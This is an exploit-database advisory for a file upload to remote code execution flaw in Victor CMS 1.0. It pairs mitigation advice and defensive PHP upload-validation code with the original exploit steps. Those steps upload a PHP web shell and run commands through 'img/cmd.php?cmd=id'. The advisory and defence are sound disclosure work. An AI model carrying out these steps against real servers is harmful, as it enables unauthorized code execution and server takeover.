Vendor: CMSsite
By: Mosaaed
CVSS: 9.8 (HIGH)
Remote Code Execution
CWE: 434
Product Name: CMSsite
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:victor_alagwu:cms_site
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Apache2/Linux
2020

Victor CMS 1.0 – File Upload To RCE

Victor CMS 1.0 has a file upload vulnerability that allows an attacker to upload a malicious PHP file and execute arbitrary code on the server. An attacker can register on the website, log in as a user, go to the profile page, upload a malicious PHP file, update the user and then access the file in the img folder. The attacker can then execute arbitrary code on the server by accessing the file with a command parameter.

Mitigation:

The application should validate the type of each file before accepting the upload. The application should also prevent users from uploading files into the web root directory.
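
One way to implement both mitigation points in PHP, as an added example that is not Victor CMS code and not part of the original advisory. The function names, the 2 MiB limit and the storage directory argument are assumptions.

```php
<?php
// Added example, not Victor CMS code. Names, size limit and paths are assumptions.
const ALLOWED_TYPES = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif'];
const MAX_BYTES = 2097152; // 2 MiB, assumed limit

/** Returns a server-chosen file name for an acceptable image, or null to reject. */
function safe_image_name(string $tmpPath, string $clientName): ?string
{
    $size = @filesize($tmpPath);
    if ($size === false || $size === 0 || $size > MAX_BYTES) {
        return null;
    }
    // Type comes from the file content, never from the client's name or Content-Type.
    $info = @getimagesize($tmpPath);
    $ext = $info === false ? null : (ALLOWED_TYPES[$info[2]] ?? null);
    if ($ext === null) {
        return null;
    }
    // The extension the client claimed must agree with the detected type.
    $claimed = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (($claimed === 'jpeg' ? 'jpg' : $claimed) !== $ext) {
        return null;
    }
    // Random name plus fixed extension: nothing client-controlled reaches the path.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

/** Moves one $_FILES entry into $storageDir, which must lie outside the web root. */
function store_profile_image(array $file, string $storageDir): ?string
{
    $tmp = (string) ($file['tmp_name'] ?? '');
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($tmp)) {
        return null;
    }
    $name = safe_image_name($tmp, (string) ($file['name'] ?? ''));
    if ($name === null || !move_uploaded_file($tmp, rtrim($storageDir, '/') . '/' . $name)) {
        return null;
    }
    return $name; // save this in the user row; serve it via a script that calls readfile()
}

// CLI self-check on constructed samples: a 1x1 PNG and a harmless PHP stub.
if (PHP_SAPI === 'cli') {
    $png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');
    $stub = '<?php // constructed, harmless';
    $samples = [['avatar.png', $png], ['avatar.php', $png], ['photo.png', $stub], ['shell.php', $stub]];
    foreach ($samples as [$name, $bytes]) {
        $tmp = tempnam(sys_get_temp_dir(), 'up');
        file_put_contents($tmp, $bytes);
        printf("%-12s %s\n", $name, safe_image_name($tmp, $name) === null ? 'rejected' : 'accepted');
        unlink($tmp);
    }
}
```

A file with a valid image header can still carry other bytes after it, so the content check alone is not sufficient. The server-chosen name with a fixed image extension and the storage directory outside the web root are what keep an accepted file from being interpreted as PHP.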

Exploit-DB raw data:

# Exploit Title: Victor CMS 1.0 - File Upload To RCE
# Date: 20.12.2020
# Exploit Author: Mosaaed
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0

# Tested on: Apache2/Linux

Step 1: register http://localhost/CMSsite-master/register.php
Step 2: login as user
Step 3: Go to Profile
Step 4: upload image as php file (upload shell.php)
Step 5: update user
Step 6: You will find your shell in img folder: /path/img/cmd.php

http://localhost/CMSsite-master/img/cmd.php?cmd=id

uid=33(www-data) gid=33(www-data) groups=33(www-data)